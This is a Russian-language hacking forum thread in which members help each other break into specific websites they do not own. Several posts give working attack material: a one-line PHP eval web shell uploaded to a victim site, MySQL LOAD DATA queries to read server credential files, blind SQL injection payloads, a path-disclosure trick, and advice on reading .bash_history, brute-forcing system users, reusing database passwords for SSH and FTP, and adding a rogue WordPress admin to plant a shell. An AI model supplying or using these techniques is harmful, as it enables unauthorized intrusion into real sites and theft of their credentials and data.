Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    хм.. пробовал
    Code:
    LOAD DATA LOCAL INFILE '/etc/mysql/my.cnf' INTO TABLE test FIELDS TERMINATED BY '\n'
    выдает
    Code:
    #2000 - open_basedir restriction in effect. Unable to open file
    или файл не найден на старых версиях пхпмайадмина
    Code:
    #2 - File '/etc/mysql/my.cnf' not found (Errcode: 2)
    #13 - File '/root/.my.cnf' not found (Errcode: 13)  
    и так на больше 10 майадминов без рута
     
    #23701 mazaxaka, 18 Dec 2014
    Last edited: 18 Dec 2014
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    969
    Likes Received:
    120
    Reputations:
    25
    Можно тут что нибудь сделать?
    фильтрует запятые, скобки
     
    #23702 Br@!ns, 19 Dec 2014
    Last edited: 19 Dec 2014
  3. zarif

    zarif Banned

    Joined:
    12 Feb 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Wulnerable это выдал.
    Можно здесь что-нибудь сделать?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    inj в order by — значит только blind или error-based. фильтр на = и (
    урленкод и даблурленкод тоже не помог, да и векторов без использования скобок я не видел.
     
    _________________________
    #23704 yarbabin, 19 Dec 2014
    Last edited: 19 Dec 2014
    1 person likes this.
  5. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    182
    Likes Received:
    38
    Reputations:
    18
    Парни кто поможет с моим вопросом? Буду очень благодарен!




     
  6. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    по моему вариант что в том файле будет пароль рута 1 на милион

    иногда тут 'etc/passwd' бывают пароли открытые
     
    #23706 mazaxaka, 21 Dec 2014
    Last edited: 21 Dec 2014
  7. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    413
    Likes Received:
    153
    Reputations:
    19
    в файле etc/my.conf нет паролей от мускуля. пароли от пользователей мускуля хранятся обыно в таблицах и в зашифрованом виде. таблицы хранятся в файлах. которые хранятся в каталоге. каталог можно посмотреть в файле etc/my.conf переменная datadir

    Советую искать пароли от юзеров мускуля в скриптах и конфигах. 100% что там они будут в открытом виде.

    в /etc/passwd уже не один дистр по дефолту уже пароли не хранит
     
  8. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    182
    Likes Received:
    38
    Reputations:
    18
    /etc/my.conf не читает

    /etc/mysql/my.cnf показал datadir:

    /var/lib/mysql

    Как дальше быть? Ну все что я нашел в скриптах и фалах, это логин и пароль не от рута, с него я и делаю эти запросы. Есть еще ISP Manager. Может от него как-то можно найти пароли или он как-то сможет помочь? Нужно любым способом залить шелл.
    Phpinfo тоже есть.

    Может каким-то образом можно получить структуру файлов и папок?
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    структуру только брутфорсом и раскрытием путей. если есть phpinfo, стоит посмотреть L/RFI. стоит просканить порты и директории, посмотреть, что на них. узнайте, что за хостер, попробуйте выяснить местоположение phpmyadmin. загляните в .bash_history и другие интересные файлы, нередко там встречается интересная информация. пробовали пароль от mysql для ssh, ftp? посмотрите passwd и пользователей оттуда, брутфорс никто не отменял. просканируйте поддмены, dnsenum, pyknock, AXFR.
    одной SQLi хек не ограничивается.
     
    _________________________
  10. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    есть сайт, заливаю шел а он сразу трется, пробовал разные штук 5 все трет.
    заливаю
    Code:
    eval($_REQUEST[e]);
    вывожу пхпинфо, но там нету путей, только до пхп и мускула, а на папку домена нету.
    как через евал можно прочитать файл конфиг например, или раскрыть пути

    Code:
    $page = $_GET['page'];
    include($page.'.php');
    тоже пробовал. не работает.

    в общем могу залить любой пхп кроме шелов(( подскажите что можно сделать в данном случае
     
  11. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,091
    Likes Received:
    526
    Reputations:
    173
    через системные команды посмотреть?
     
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,469
    Likes Received:
    785
    Reputations:
    834
    Покажет текущию папку где выполняется скрипт:
    PHP:
    echo dirname(__FILE__);
    если вывод ошибок не отключен, то как вариант можно использовать баги в функциях:
    PHP:
    echo htmlspecialchars($_REQUEST[e]);
    вызываем так: ?e[]=123 будет раскрытие путей.

    Чтобы прочитать файл конфига, можно сделать так:
    PHP:
    echo file_get_contents('config.php');
    это всего лишь банальные команды, а если системные будут включены там вообще все намного проще и очень странно, что вам phpinfo(), очень мало инфы выдало...

    По поводу заливки, наверное просто какой то мод секьюрити не дает им залиться, а скорее заливаются но права автоматически на выполнение закрываются, попробуйте какой нить обычный файловый менеджер залить или упрощенный шелл, также можно попробовать поменять расширение шелла.
     
    _________________________
    1 person likes this.
  13. T1B3R

    T1B3R Member

    Joined:
    22 Sep 2010
    Messages:
    259
    Likes Received:
    20
    Reputations:
    1
    вопрос по файлу wp-config.php
    есть доступ к файлу конфигурации вп. Как можно получить доступ к сайту?
    В файле есть логин и пароль для базы данных, но как зайти в базу данных?
     
  14. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
    Никак
     
  15. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    С чего ты взял? Есть шанс, что СУБД находится рядом с сайтом.
    А вообще пароль может быть таким же как и от админки, этот факт тоже нужно учитывать.
     
  16. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
    Ничтожный же шанс.
    Вопрос про бд вроде был
     
  17. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    Code:
    ...php?ID=12234+AND+1=1
    -> истинный вывод
    Code:
    ...php?ID=12234+AND+1=2
    -> неверный вывод

    В общем, boolean based, mysql. Как раскручивать? Обычно я sqlmap'ом слепые раскручиваю, но тут типа [CRITICAL] unable to retrieve the database names
     
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    «Никак» это означает, что шансов нет. Да и смотреть нужно на конкретную ситуацию, о которой вы даже не знаете. Не стоит вводить в заблуждение.
    Ответ: да, можно. Ищите на портах, в папках, поддоменах.
     
    _________________________
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    and(subsrt((select table_name from information_schema.tables limit 1,1),1,1))='c'
     
    _________________________
  20. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    еще такой вопрос возник, есть бд file-priv n
    цмс вордпрес.добовляю нового админа. гружу через плагины.или не грузится или отображает код шелла, вп 3.6-4.0 есть варианты загрузить или проинклудить както?

    П.с плагины редактировать не могу и тему изменять тоже, везде пишет

    Code:
    Чтобы сохранить изменения, нужно сделать этот файл доступным для записи. Дополнительную информацию можно получить в Кодексе.
    
     
Loading...
Thread Status:
Not open for further replies.